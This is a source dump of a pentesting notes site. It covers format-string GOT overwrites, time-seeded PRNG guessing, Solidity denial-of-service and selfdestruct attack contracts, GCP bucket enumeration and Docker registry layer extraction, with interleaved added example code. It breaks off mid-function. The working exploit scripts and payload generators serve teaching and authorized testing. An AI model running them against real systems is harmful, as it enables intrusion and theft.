10 | Exploit Notes is only for educational purposes and authorized penetration testing, not for attacking servers that you are not authorized to test.
11 | This site will not take any responsibility even if you attack a server illegally or cause damage unintentionally.
12 | Please use the contents at your own risk.
13 |
14 |
15 | The contents are not original but are based on information from the internet that the author actually tried and confirmed to work.
16 | Although the author strives to keep the content of this site as up to date as possible, there is no guarantee that it is always current.
17 |
18 |
19 | I'm not a security expert, just an enthusiast, so the contents written are not necessarily accurate.
20 |
21 |
22 |
23 |
24 |
--------------------------------------------------------------------------------
/src/exploit/_data.yml:
--------------------------------------------------------------------------------
1 | type: exploit
2 | layout: layouts/exploit.vto
3 | date: Git Last Modified
--------------------------------------------------------------------------------
/src/exploit/audio/_data.yml:
--------------------------------------------------------------------------------
1 | category1: audio
2 | related_menus:
3 | - title: Audio
4 |   id: others
--------------------------------------------------------------------------------
/src/exploit/audio/sstv.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: SSTV (Slow-scan Television)
3 | description: SSTV is a picture transmission method by amateur radio operators. We can extract pictures from audio files.
4 | tags:
5 | - Audio
6 | - Spectrogram
7 | refs:
8 | - https://oe5lxr.at/decode-sstv-with-mmsstv/
9 | date: 2023-07-19
10 | draft: false
11 | ---
12 |
13 | ## Decode SSTV
14 |
15 | Some tools for decoding SSTV from an audio file:
16 |
17 | - **MMSSTV** (for Windows)
18 | - **QSSTV** (for Linux)
19 | - **[sstv](https://github.com/colaclanth/sstv)** (Command-line tool)
--------------------------------------------------------------------------------
/src/exploit/binary-exploitation/_data.yml:
--------------------------------------------------------------------------------
1 | category1: binary-exploitation
2 | related_menus:
3 | - title: Method
4 |   id: method
5 | - title: Cheatsheet
6 |   id: cheatsheet
7 | - title: Binary Exploitation
8 |   id: others
--------------------------------------------------------------------------------
/src/exploit/binary-exploitation/cheatsheet/_data.yml:
--------------------------------------------------------------------------------
1 | category2: cheatsheet
--------------------------------------------------------------------------------
/src/exploit/binary-exploitation/method/_data.yml:
--------------------------------------------------------------------------------
1 | category2: method
--------------------------------------------------------------------------------
/src/exploit/binary-exploitation/method/binary-exploitation-with-got.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Binary Exploitation with GOT
3 | description: The GOT (Global Offset Table) is the table of pointers in an ELF binary that the dynamic linker fills with the addresses of shared-library functions. Because it is written at run time, a write primitive such as a format string bug can overwrite an entry and redirect the next call to that function.
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2023-02-12
8 | draft: false
9 | ---
10 |
11 | ## GOT Overwriting
12 |
13 | ```python
14 | from pwn import *
15 | # Target: a binary with a format-string bug and a writable GOT (no or partial RELRO), without PIE.
16 | context.update(arch="amd64", os="linux")
17 | # Full RELRO would make the GOT read-only: check with `checksec ./example` before trying this.
18 | filepath = "./example"
19 | # Loading the ELF gives us the elf.got[...] and elf.sym[...] addresses used below.
20 | elf = context.binary = ELF(filepath)
21 |
22 | p = process(filepath) # p = remote('example.com', 1337)
23 | # Drain the banner, answer the first prompt with an empty line, drain again.
24 | p.clean()
25 | p.sendline()
26 | p.clean()
27 | # 10 is the stack argument index at which our input is found (find it with %p / %<n>$p probes).
28 | payload = fmtstr_payload(10, {elf.got['puts'] : elf.sym['holidays']}) # write &holidays into puts' GOT entry
29 | p.sendline(payload) # the next call to puts() now lands in holidays()
30 | p.interactive()
31 | ```
32 |
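The following is an added example, not code from the original page: it builds by hand the kind of format-string payload that `fmtstr_payload()` generates, and checks it against a small model of `printf()` so the mechanics of the GOT overwrite are visible. The GOT address (`0x404018`) and the target function address (`0x401196`) are constructed placeholders, not addresses from the page's binary.

```python
# Added example (not from the original page): build a %hn-based format-string
# write payload and verify it against a minimal printf model. Addresses below
# are constructed placeholders, not taken from any real binary.
import struct


def build_fmt_write(offset: int, writes: dict, already_written: int = 0) -> bytes:
    """Return a printf format string that writes each {address: 64-bit value}
    in `writes` using 2-byte '%hn' writes.

    `offset` is the stack-argument index at which printf sees the start of our
    buffer (the same number the page passes as fmtstr_payload's first argument).
    On amd64 the target addresses contain NUL bytes, so they go at the end of
    the payload, after every conversion specifier.
    """
    # Split each 8-byte value into four 2-byte chunks so no single %c width
    # has to exceed 65535 characters.
    chunks = []
    for addr, value in writes.items():
        for i in range(4):
            chunks.append((addr + 2 * i, (value >> (16 * i)) & 0xFFFF))
    # Write the smallest values first: the character counter only ever grows,
    # so each %hn needs at most a 16-bit wrap to reach the next target value.
    chunks.sort(key=lambda c: c[1])

    fmt_len = 0
    while True:
        # The addresses sit right after the (8-byte aligned) format part, so
        # their argument index depends on the format part's own length.
        addr_index = offset + fmt_len // 8
        fmt = b""
        count = already_written
        for i, (_, value) in enumerate(chunks):
            pad = (value - count) % 0x10000
            if pad:
                fmt += b"%" + str(pad).encode() + b"c"  # print `pad` more chars
                count += pad
            fmt += b"%" + str(addr_index + i).encode() + b"$hn"
        aligned = (len(fmt) + 7) // 8 * 8
        if aligned == fmt_len:
            break
        fmt_len = aligned  # larger indices may need more digits, so iterate
    fmt = fmt.ljust(fmt_len, b"A")  # filler is printed after the last %hn
    return fmt + b"".join(struct.pack("<Q", addr) for addr, _ in chunks)


def simulate_printf(payload: bytes, offset: int, memory: dict) -> int:
    """Minimal model of printf(buf) on amd64 with buf at stack argument `offset`.

    Handles literal bytes, '%<n>c' and '%<k>$hn' (all the payload uses), stops
    at the first NUL like the real function, and returns the character count.
    """
    def stack_arg(k: int) -> int:
        start = 8 * (k - offset)
        return struct.unpack("<Q", payload[start:start + 8].ljust(8, b"\0"))[0]

    count, i = 0, 0
    while i < len(payload) and payload[i] != 0:
        if payload[i] != ord("%"):
            count, i = count + 1, i + 1
            continue
        j = i + 1
        while payload[j:j + 1].isdigit():
            j += 1
        if j == i + 1:
            raise ValueError("unsupported conversion in payload")
        num = int(payload[i + 1:j])
        if payload[j:j + 1] == b"c":
            count += num  # a char argument padded to width `num`
            i = j + 1
        elif payload[j:j + 3] == b"$hn":
            addr = stack_arg(num)  # %k$hn stores the low 16 bits of count there
            memory[addr] = count & 0xFF
            memory[addr + 1] = (count >> 8) & 0xFF
            i = j + 3
        else:
            raise ValueError("unsupported conversion in payload")
    return count


def read_qword(memory: dict, addr: int) -> int:
    return int.from_bytes(bytes(memory.get(addr + i, 0) for i in range(8)), "little")


if __name__ == "__main__":
    GOT_PUTS, TARGET = 0x404018, 0x401196  # constructed placeholder addresses
    payload = build_fmt_write(10, {GOT_PUTS: TARGET})
    mem = {}
    simulate_printf(payload, 10, mem)
    print(payload)
    print(hex(read_qword(mem, GOT_PUTS)))
```

The payload's only job is to get the character counter to each 16-bit chunk value right before the matching `%hn`; writing the chunks in ascending order keeps every `%c` width small, which is also why pwntools' payloads look like `%64c%17$hn%4438c%18$hn...`.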
--------------------------------------------------------------------------------
/src/exploit/binary-exploitation/method/binary-exploitation-with-ret2plt.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Binary Exploitation with ret2plt
3 | description:
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2023-02-12
8 | draft: false
9 | ---
10 |
11 | No content yet.
--------------------------------------------------------------------------------
/src/exploit/binary-exploitation/method/binary-exploitation-with-time-guessing.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Binary Exploitation with Time Guessing
3 | description:
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2023-03-01
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```bash
14 | ./example
15 |
16 | Guess the number: 1111
17 | You losed. The correct answer is 1475693029
18 |
19 | Guess the number: 12345678
20 | You losed. The correct answer is 8246712747
21 | ```
22 |
23 | If a binary asks us to guess a number derived from the current time (typically a PRNG seeded with `time(NULL)`), every instance started in the same second produces the same number, so we can take the answer from one run and feed it to a second run through a shell pipe.
24 |
25 |
26 |
27 | ## Exploitation
28 |
29 | ```bash
30 | # tr -dc '0-9': keep only the digits of the first run's output, i.e. the correct number.
31 | echo 1234 | ./example | tr -dc '0-9' | ./example
32 | ```
33 |
34 | The above payload inputs '1234' first, so the first instance of the binary reveals the correct number. **`tr`** extracts that number and passes it as the input of the second instance.
35 | Because the number depends only on the current time, the previous answer is still correct when it is passed on immediately. This works only while both instances start within the same second and the binary's other output contains no digits; otherwise compute the value for the current second yourself and send it directly.
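The following is an added example, not code from the original page. It reproduces glibc's `rand()` stream for a given seed in pure Python; if the binary seeds with `srand(time(NULL))` (an assumption: the page does not show its source, and the answers it prints are larger than any single `rand()` value, so it must post-process them), the answer for any second can be computed without running the binary at all.

```python
# Added example (not from the original page): glibc's rand() for a given seed,
# implemented in pure Python so a time-seeded value can be predicted offline.
import time


def glibc_rand_sequence(seed: int, count: int) -> list:
    """Return the first `count` values rand() produces after srand(seed).

    Implements glibc's default TYPE_3 additive-feedback generator: a 31-word
    table seeded with a Park-Miller LCG, 310 discarded outputs, then
    r[i] = r[i-31] + r[i-3] (mod 2**32) with each result shifted right by one.
    """
    seed &= 0xFFFFFFFF
    if seed == 0:
        seed = 1  # glibc replaces a zero seed with 1
    word = seed - (1 << 32) if seed & 0x80000000 else seed  # as int32_t
    r = [0] * (344 + count)
    r[0] = word
    for i in range(1, 31):
        # word = 16807 * word mod (2**31 - 1), computed with Schrage's method
        # and C's truncating division, exactly as glibc does.
        hi = abs(word) // 127773 * (1 if word >= 0 else -1)
        lo = word - hi * 127773
        word = 16807 * lo - 2836 * hi
        if word < 0:
            word += 2147483647
        r[i] = word
    for i in range(31, 34):
        r[i] = r[i - 31]
    for i in range(34, 344 + count):
        r[i] = (r[i - 31] + r[i - 3]) & 0xFFFFFFFF
    return [r[i] >> 1 for i in range(344, 344 + count)]


def predict_time_seeded_rand(t: int = None) -> int:
    """First rand() value of a program that ran srand(time(NULL)) at second t
    (assumed seeding scheme; defaults to the current second)."""
    if t is None:
        t = int(time.time())
    return glibc_rand_sequence(t, 1)[0]


if __name__ == "__main__":
    print(glibc_rand_sequence(1, 3))     # what `srand(1); rand()` yields on glibc
    print(predict_time_seeded_rand())    # this second's first rand() value
```

Because the generator is fully determined by the seed, a binary that seeds from the clock can be beaten for any second, past or future, by feeding `predict_time_seeded_rand(t)` (or the binary's own post-processing of it) to it at time `t`.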
--------------------------------------------------------------------------------
/src/exploit/blockchain/_data.yaml:
--------------------------------------------------------------------------------
1 | category1: blockchain
2 | related_menus:
3 | - title: Smart Contract
4 |   id: smart-contract
5 | - title: Others
6 |   id: others
--------------------------------------------------------------------------------
/src/exploit/blockchain/blockchain-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Blockchain Pentesting
3 | description: A type of Distributed Ledger Technology (DLT) that consists of a growing list of records, called blocks, that are securely linked together using cryptography.
4 | tags:
5 | - Blockchain
6 | - Web3
7 | refs:
8 | date: 2023-10-11
9 | draft: false
10 | ---
11 |
12 | ## Explore Transactions
13 |
14 | - [blockchain.com](https://www.blockchain.com/explorer)
15 |
16 | The most popular and trusted block explorer and crypto transaction search engine.
17 |
18 | - [Block Explorer](https://blockexplorer.com/)
19 |
20 | The Handshake Block Explorer.
21 |
22 | - [etherchain.org](https://www.etherchain.org/)
23 |
24 | The Ethereum blockchain explorer.
25 |
26 | - [OXT](https://oxt.me/)
27 |
28 |
29 |
30 |
31 | ## Explore Wallets
32 |
33 | - [Wallet Explorer](https://www.walletexplorer.com/)
34 |
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/_data.yaml:
--------------------------------------------------------------------------------
1 | category2: smart-contract
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/solidity-contarct-address-recovery.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Solidity Contract Address Recovery
3 | description:
4 | tags:
5 | - Blockchain
6 | - Ethereum
7 | refs:
8 | - https://ethereum.stackexchange.com/questions/760/how-is-the-address-of-an-ethereum-contract-computed
9 | - https://blog.dixitaditya.com/ethernaut-level-17-recovery
10 | date: 2023-09-30
11 | draft: false
12 | ---
13 |
14 | ## Create a Contract for Recovery Address
15 |
16 | This contract recomputes the address of a contract whose address has been lost (for example one created by another contract and never recorded). A CREATE address is the last 20 bytes of `keccak256(rlp([sender, nonce]))`; the bytes below are the RLP encoding for a 20-byte sender and nonce 1, i.e. the first contract created by `_creatorAddress` when the creator is itself a contract (contract nonces start at 1).
17 |
18 | ```js
19 | // SPDX-License-Identifier: MIT
20 | pragma solidity ^0.8.0;
21 |
22 | contract ContractRecovery {
23 |     // 0xd6: RLP list prefix (0xc0 + 22 bytes of payload)
24 |     // 0x94: RLP prefix of a 20-byte string (0x80 + 20), followed by the creator address
25 |     // 0x01: nonce 1 (other nonces change this byte and, above 127, the list length too)
26 |     constructor(address _creatorAddress) {
27 |         address lostAddress = address(uint160(uint256(keccak256(abi.encodePacked(bytes1(0xd6), bytes1(0x94), address(_creatorAddress), bytes1(0x01))))));
28 |         // some code here ...
29 |     }
30 | }
31 | ```
30 |
31 | Another way is to use [Etherscan](https://etherscan.io/) transaction history.
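The following is an added example, not code from the original page: it computes a CREATE contract address off-chain for any nonce, which is what the Solidity snippet above does for nonce 1 only. Keccak-256 is implemented in pure Python so it runs without web3 or pycryptodome (it follows the structure of the Keccak team's compact reference implementation), and the RLP encoding is generated rather than hard-coded. The sample sender address is the public test vector from the Stack Exchange answer linked in the refs.

```python
# Added example (not from the original page): CREATE address derivation,
# keccak256(rlp([sender, nonce]))[12:], with a self-contained Keccak-256.

MASK64 = (1 << 64) - 1


def _rol64(a: int, n: int) -> int:
    n %= 64
    return ((a << n) | (a >> (64 - n))) & MASK64


def _keccak_f1600(state: bytearray) -> bytearray:
    """Keccak-f[1600] on a 200-byte state laid out as 25 little-endian lanes."""
    lanes = [[int.from_bytes(state[8 * (x + 5 * y):8 * (x + 5 * y) + 8], "little")
              for y in range(5)] for x in range(5)]
    lfsr = 1
    for _ in range(24):
        # theta: mix in column parities
        c = [lanes[x][0] ^ lanes[x][1] ^ lanes[x][2] ^ lanes[x][3] ^ lanes[x][4]
             for x in range(5)]
        d = [c[(x - 1) % 5] ^ _rol64(c[(x + 1) % 5], 1) for x in range(5)]
        lanes = [[lanes[x][y] ^ d[x] for y in range(5)] for x in range(5)]
        # rho and pi: rotate each lane and move it to its new position
        x, y = 1, 0
        current = lanes[x][y]
        for t in range(24):
            x, y = y, (2 * x + 3 * y) % 5
            current, lanes[x][y] = lanes[x][y], _rol64(current, (t + 1) * (t + 2) // 2)
        # chi: non-linear row mixing
        for y in range(5):
            row = [lanes[x][y] for x in range(5)]
            for x in range(5):
                lanes[x][y] = row[x] ^ ((~row[(x + 1) % 5]) & row[(x + 2) % 5])
        # iota: round constant, produced bit by bit from an 8-bit LFSR
        for j in range(7):
            lfsr = ((lfsr << 1) ^ ((lfsr >> 7) * 0x71)) % 256
            if lfsr & 2:
                lanes[0][0] ^= 1 << ((1 << j) - 1)
    out = bytearray(200)
    for x in range(5):
        for y in range(5):
            out[8 * (x + 5 * y):8 * (x + 5 * y) + 8] = lanes[x][y].to_bytes(8, "little")
    return out


def keccak256(data: bytes) -> bytes:
    """Ethereum's Keccak-256: rate 1088 bits, pad10*1 with suffix 0x01
    (SHA3-256 differs only in using the suffix 0x06)."""
    rate = 136
    padded = bytearray(data) + b"\x01"
    padded += b"\x00" * (-len(padded) % rate)
    padded[-1] |= 0x80
    state = bytearray(200)
    for i in range(0, len(padded), rate):
        for j in range(rate):
            state[j] ^= padded[i + j]
        state = _keccak_f1600(state)
    return bytes(state[:32])


def _rlp_bytes(b: bytes) -> bytes:
    """RLP for a byte string shorter than 56 bytes (enough for address and nonce)."""
    if len(b) == 1 and b[0] < 0x80:
        return b
    return bytes([0x80 + len(b)]) + b


def rlp_sender_nonce(sender: bytes, nonce: int) -> bytes:
    """RLP of [sender, nonce]: nonce 0 is the empty string, larger nonces are
    minimal big-endian integers. For nonce 1 this yields 0xd6 0x94 <sender> 0x01."""
    nonce_bytes = nonce.to_bytes((nonce.bit_length() + 7) // 8, "big")
    payload = _rlp_bytes(sender) + _rlp_bytes(nonce_bytes)
    return bytes([0xC0 + len(payload)]) + payload


def contract_address(sender: bytes, nonce: int) -> bytes:
    """Address of the contract created by `sender` (20 bytes) at `nonce`."""
    return keccak256(rlp_sender_nonce(sender, nonce))[12:]


if __name__ == "__main__":
    creator = bytes.fromhex("6ac7ea33f8831ea9dcc53393aaa88b25a785dbf0")  # public test vector
    for nonce in range(3):
        print(nonce, "0x" + contract_address(creator, nonce).hex())
```

Running it for nonces 0, 1, 2, ... of the creator address enumerates every contract it has ever deployed with CREATE, which is the same search Etherscan's transaction history would give you without needing the explorer.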
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/solidity-conversion.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Solidity Conversion
3 | description:
4 | tags:
5 | - Blockchain
6 | - Ethereum
7 | refs:
8 | - https://www.tutorialspoint.com/solidity/solidity_conversions.htm
9 | - https://coinsbench.com/12-privacy-ethernaut-explained-8ee480f303f2
10 | date: 2023-09-30
11 | draft: false
12 | ---
13 |
14 | ## Explicit Conversion
15 |
16 | When we cast a smaller type to a bigger type, there's no problem. However, when we cast a bigger type to a smaller type, data may be lost partially.
17 |
18 | ### Uint/Int
19 |
20 | ```js
21 | // uint32 -> uint16
22 | uint32 a = 0x12345678;
23 | uint16 b = uint16(a); // 0x5678
24 |
25 | // uint16 -> uint32
26 | uint16 a = 0x1234;
27 | uint32 b = uint32(a); // 0x00001234
28 | ```
29 |
30 | ### Bytes
31 |
32 | ```js
33 | // bytes2 -> bytes1
34 | bytes2 a = 0x1234;
35 | bytes1 b = bytes1(a); // 0x12
36 |
37 | // bytes2 -> bytes4
38 | bytes2 a = 0x1234;
39 | bytes4 b = bytes4(a); // 0x12340000
40 | ```
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/solidity-denial-of-service-attack.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Solidity Denial of Service Attack
3 | description: We can make a Solidity contract's function unusable (denial of service) by consuming all the gas it forwards to an external call, using various ways.
4 | tags:
5 | - Blockchain
6 | - Ethereum
7 | refs:
8 | - https://coinsbench.com/20-denial-ethernaut-explained-92bc3f7562ec
9 | date: 2023-09-30
10 | draft: false
11 | ---
12 |
13 | ## DoS with Assembly Invalid Function
14 |
15 | The `invalid()` opcode in inline assembly consumes all the gas available to the call frame it runs in. When a victim contract forwards gas to an attacker-controlled address with `call` and does not check the result, the attacker's fallback burns everything it received and the victim is left with only the 1/64 of its gas that EIP-150 holds back, which is usually not enough to finish the rest of the function.
16 |
17 | ```js
18 | // SPDX-License-Identifier: MIT
19 | pragma solidity ^0.8.0;
20 |
21 | contract Victim {
22 |     address public owner;
23 |     uint public balance;
24 |
25 |     // Forwards all but 1/64 of the remaining gas to _address; the result is
26 |     // ignored, so a gas-burning callee stalls whatever follows the call.
27 |     function withdrawUser(address _address) public {
28 |         (bool success, ) = _address.call{value: balance}("");
29 |         // Some code ...
30 |     }
31 | }
32 |
33 | contract Attack {
34 |     Victim target;
35 |
36 |     constructor(address _targetAddress) {
37 |         target = Victim(_targetAddress);
38 |         target.withdrawUser(address(this)); // make the victim pay this contract
39 |     }
40 |
41 |     // Runs when Victim sends us Ether; burns every unit of gas it was given.
42 |     fallback() payable external {
43 |         assembly {
44 |             invalid()
45 |         }
46 |     }
47 | }
48 | ```
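The following is an added example, not code from the original page: the same withdrawal written so that a gas-burning or reverting payee cannot block anyone else. The contract and function names are hypothetical.

```solidity
// Added example (not from the original page): a withdrawal that survives a
// payee whose fallback() runs invalid(). Names are hypothetical.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract SaferVictim {
    mapping(address => uint256) public balances;

    receive() external payable {
        balances[msg.sender] += msg.value;
    }

    // Pull payment: each user withdraws only their own share, so a payee that
    // burns gas or reverts only breaks their own withdrawal.
    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0; // effects before the external interaction
        // Forward a bounded gas amount instead of everything that is left, and
        // do not ignore the result: invalid() in the callee can burn at most
        // this stipend, and the failure surfaces here as a revert.
        (bool ok, ) = msg.sender.call{value: amount, gas: 10000}("");
        require(ok, "transfer failed");
    }
}
```

The two changes that matter are the pull-payment pattern (no loop over other users' addresses inside one transaction) and the explicit gas limit with a checked return value; together they confine the cost of a hostile callee to the caller who chose it.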
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/solidity-overflow-and-underflow.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Solidity Overflow & Underflow
3 | description: Solidity is vulnerable to overflow and underflow of uint variables on the version <0.8.
4 | tags:
5 | - Blockchain
6 | - Ethereum
7 | refs:
8 | date: 2023-09-27
9 | draft: false
10 | ---
11 |
12 | ## Overflow
13 |
14 | ```js
15 | uint8 value = 255;
16 | value++;
17 | // Result: value = 0
18 | ```
19 |
20 |
21 |
22 | ## Underflow
23 |
24 | ```js
25 | uint8 value = 0;
26 | value--;
27 | // Result: value = 255
28 | ```
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/solidity-self-destruct-attack.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Solidity Self Destruct Attack
3 | description: Solidity's `selfdestruct` removes the calling contract and force-sends its entire balance to a target address without running any code there. An attacker can use it to push Ether into a contract that refuses payments, breaking logic that assumes the balance only changes through its own functions.
4 | tags:
5 | - Blockchain
6 | - Ethereum
7 | refs:
8 | date: 2023-09-30
9 | draft: false
10 | ---
11 |
12 | ## Create a Malicious Contract that Self-Destructs into the Target
13 |
14 | Calling `attack()` with Ether attached destroys the `Attack` contract and forces its balance into `_address`, even if that contract has no payable function or rejects incoming Ether. Since the Cancun upgrade (EIP-6780) `selfdestruct` only removes the contract when it runs in the same transaction as the contract's creation, but the forced balance transfer still happens.
15 |
16 | ```js
17 | // SPDX-License-Identifier: MIT
18 | pragma solidity ^0.4.0;
19 |
20 | contract Attack {
21 |     // Call with some Ether attached: selfdestruct removes this contract and
22 |     // sends its whole balance to _address without executing any code there.
23 |     function attack(address _address) payable public {
24 |         // the remaining Ether is sent to _address when destructing
25 |         selfdestruct(_address);
26 |     }
27 | }
28 | ```
25 |
--------------------------------------------------------------------------------
/src/exploit/blockchain/smart-contract/solidity-smart-contract-attack-methodology.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Solidity Smart Contract Attack Methodology
3 | description: When attacking target contract, we can create an attack contract which loads the target contract and abuse it.
4 | tags:
5 | - Blockchain
6 | - Ethereum
7 | refs:
8 | date: 2023-09-30
9 | draft: false
10 | ---
11 |
12 | ## Create an Attack Contract
13 |
14 | ```js
15 | // SPDX-License-Identifier: MIT
16 | pragma solidity ^0.8.0;
17 |
18 | // Define interface for victim contract
19 | interface IVictim {
20 |     // Set the Victim contract functions
21 |     function example1() external;
22 |     function example2(uint) external;
23 | }
24 |
25 | // Define Attack contract to compromise the victim contract
26 | contract Attack {
27 |     IVictim public victim;
28 |
29 |     constructor(address _victimAddress) {
30 |         // Initialize Victim contract (interface)
31 |         victim = IVictim(_victimAddress);
32 |     }
33 |
34 |     // Create a function to be used for attacking the victim contract
35 |     function attack() public {
36 |         victim.example1();
37 |         victim.example2(1);
38 |     }
39 | }
40 | ```
--------------------------------------------------------------------------------
/src/exploit/cloud/_data.yml:
--------------------------------------------------------------------------------
1 | category1: cloud
2 | related_menus:
3 | - title: Others
4 |   id: others
--------------------------------------------------------------------------------
/src/exploit/cloud/gcp-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: GCP (Google Cloud Platform) Pentesting
3 | description:
4 | tags:
5 | - Cloud
6 | refs:
7 | - https://pwnedlabs.io/labs/reveal-hidden-files-in-google-storage
8 | date: 2024-12-18
9 | draft: false
10 | ---
11 |
12 | ## Install Google Cloud CLI
13 |
14 | Before pentesting GCP, we need to install the Google Cloud CLI. See [the installation guide](https://cloud.google.com/sdk/docs/install) for details.
15 | After installing it, log in with your Google credentials:
16 |
17 | ```bash
18 | gcloud auth login
19 | ```
20 |
21 |
22 |
23 | ## Google Storage
24 |
25 | Google Cloud Storage serves objects at URLs of the form `https://storage.googleapis.com/<bucket>/<object>`.
26 | We can enumerate the target bucket as below (replace `<bucket>` with the bucket name):
27 |
28 | ```bash
29 | # Enumerate accessible objects from outside (unauthenticated); -fc 403 hides forbidden responses.
30 | ffuf -u https://storage.googleapis.com/<bucket>/FUZZ -w wordlist.txt -fc 403
31 |
32 | # List objects/prefixes (anonymous listing only works if allUsers has storage.objects.list)
33 | gsutil ls gs://<bucket>/example/
34 |
35 | # Download an object into the current directory
36 | gsutil cp gs://<bucket>/example.txt .
37 |
38 | # Get metadata for an object
39 | gsutil stat gs://<bucket>/index.html
40 | ```
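The following is an added example, not code from the original page: it walks a bucket's object listing through the XML API behind `https://storage.googleapis.com/<bucket>/`, including the `IsTruncated`/`NextMarker` pagination that a single request (or a single `gsutil ls`) does not show. Only `fetch_all_keys()` touches the network and it is not called here; the XML is a constructed sample of a `ListBucketResult` page, not a real bucket's listing.

```python
# Added example (not from the original page): paginate through an anonymous
# GCS bucket listing. Sample XML below is constructed, not from a real bucket.
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

SAMPLE_PAGE_1 = """<ListBucketResult xmlns="http://doc.s3.amazonaws.com/2006-03-01">
  <Name>example-bucket</Name><Prefix></Prefix><Marker></Marker>
  <IsTruncated>true</IsTruncated><NextMarker>backup/db.sql.gz</NextMarker>
  <Contents><Key>.env</Key><Size>412</Size></Contents>
  <Contents><Key>backup/db.sql.gz</Key><Size>7340032</Size></Contents>
</ListBucketResult>"""
SAMPLE_PAGE_2 = """<ListBucketResult xmlns="http://doc.s3.amazonaws.com/2006-03-01">
  <IsTruncated>false</IsTruncated>
  <Contents><Key>index.html</Key><Size>1024</Size></Contents>
</ListBucketResult>"""


def listing_url(bucket: str, marker: str = "", prefix: str = "") -> str:
    """Listing endpoint; anonymous access works only if allUsers can list objects."""
    params = {"max-keys": "1000"}
    if marker:
        params["marker"] = marker
    if prefix:
        params["prefix"] = prefix
    return f"https://storage.googleapis.com/{bucket}/?" + urllib.parse.urlencode(params)


def parse_listing(xml_text: str):
    """Return (keys, next_marker) for one page; next_marker is None on the last page."""
    root = ET.fromstring(xml_text)
    local = lambda el: el.tag.rsplit("}", 1)[-1]  # drop the XML namespace
    keys, truncated, next_marker = [], False, None
    for el in root:
        if local(el) == "Contents":
            keys.append(next(c.text for c in el if local(c) == "Key"))
        elif local(el) == "IsTruncated":
            truncated = (el.text or "").strip().lower() == "true"
        elif local(el) == "NextMarker":
            next_marker = el.text
    if truncated and not next_marker and keys:
        next_marker = keys[-1]  # S3-style convention when NextMarker is omitted
    return keys, (next_marker if truncated else None)


def fetch_all_keys(bucket: str, prefix: str = "") -> list:
    """Follow pagination until IsTruncated is false (network access required)."""
    keys, marker = [], ""
    while True:
        with urllib.request.urlopen(listing_url(bucket, marker, prefix), timeout=20) as resp:
            page_keys, marker = parse_listing(resp.read().decode())
        keys.extend(page_keys)
        if marker is None:
            return keys
```

A 200 response with `<Contents>` entries means the bucket is publicly listable; a 403 on the listing while individual objects still download means only `storage.objects.get` is open, which is the case where the `ffuf` wordlist approach above is the right tool.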
--------------------------------------------------------------------------------
/src/exploit/container/_data.yml:
--------------------------------------------------------------------------------
1 | category1: container
2 | related_menus:
3 | - title: Docker
4 |   id: docker
5 | - title: Kubernetes
6 |   id: kubernetes
7 | - title: Others
8 |   id: others
--------------------------------------------------------------------------------
/src/exploit/container/docker/_data.yml:
--------------------------------------------------------------------------------
1 | category2: docker
--------------------------------------------------------------------------------
/src/exploit/container/docker/docker-registry-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Docker Registry Pentesting
3 | description: Docker Registry is a stateless, highly scalable server-side application that stores and lets you distribute Docker images. The default port is 5000.
4 | tags:
5 | - Container
6 | refs:
7 | - https://tbhaxor.com/exploiting-insecure-docker-registry/
8 | date: 2024-02-08
9 | draft: false
10 | ---
11 |
12 | ## Endpoints
13 |
14 | ```bash
15 | /v2/_catalog                # list repositories
16 | /v2/<name>/tags/list        # list the tags of a repository
17 | # We can download the manifest for a given tag.
18 | /v2/<name>/manifests/<tag>
19 | ```
20 |
21 |
22 |
23 | ## Extract Layers
24 |
25 | After downloading the manifest with the endpoint above, look for the `blobSum` digests (`sha256:abcd...`) in `fsLayers` (or `layers[].digest` in a schema 2 manifest). Each digest is a layer blob that can be downloaded and unpacked:
26 |
27 | ```bash
28 | curl -so 1.tar https://example.com:5000/v2/<name>/blobs/sha256:abcd...
29 | tar -xvf 1.tar
30 | ```
31 |
32 | After extracting tar files, investigate files or directories to find the sensitive information.
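The following is an added example, not code from the original page: it pulls the layer digests out of a registry manifest and turns them into the `/v2/<name>/blobs/<digest>` URLs to download, handling both the schema 1 layout the page describes (`fsLayers[].blobSum`) and the schema 2 / OCI layout (`layers[].digest`) that current registries return when the request carries `Accept: application/vnd.docker.distribution.manifest.v2+json`. The manifest JSON is a constructed sample, not from a real registry.

```python
# Added example (not from the original page): turn a registry manifest into the
# ordered list of blob URLs to fetch. Sample manifests are constructed.
import json

SAMPLE_MANIFEST_V1 = json.dumps({
    "schemaVersion": 1, "name": "app/backend", "tag": "latest",
    "fsLayers": [  # schema 1 lists the newest layer first
        {"blobSum": "sha256:" + "a" * 64},
        {"blobSum": "sha256:" + "b" * 64},
        {"blobSum": "sha256:" + "a" * 64},  # repeated empty layer: fetch once
    ],
})
SAMPLE_MANIFEST_V2 = json.dumps({
    "schemaVersion": 2,
    "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
    "config": {"digest": "sha256:" + "c" * 64},
    "layers": [{"digest": "sha256:" + "d" * 64, "size": 1234},
               {"digest": "sha256:" + "e" * 64, "size": 5678}],
})


def layer_digests(manifest_json: str) -> list:
    """Unique layer digests in extraction order (base layer first)."""
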